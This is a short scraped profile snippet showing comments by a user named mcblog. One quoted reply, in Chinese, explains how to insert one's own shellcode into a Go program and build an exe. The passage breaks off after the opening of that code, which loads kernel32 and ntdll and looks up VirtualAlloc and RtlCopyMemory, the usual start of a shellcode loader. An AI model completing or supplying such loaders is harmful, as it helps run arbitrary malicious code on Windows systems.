mcblog

Results 2 comments of mcblog

> > No description provided. > > 修改这串代码中的`shellcode here`为你的shellcode,然后使用命令`go build`构建exe文件 > > ```go > var ( > kernel32 = syscall.MustLoadDLL("kernel32.dll") > ntdll = syscall.MustLoadDLL("ntdll.dll") > VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") > RtlCopyMemory...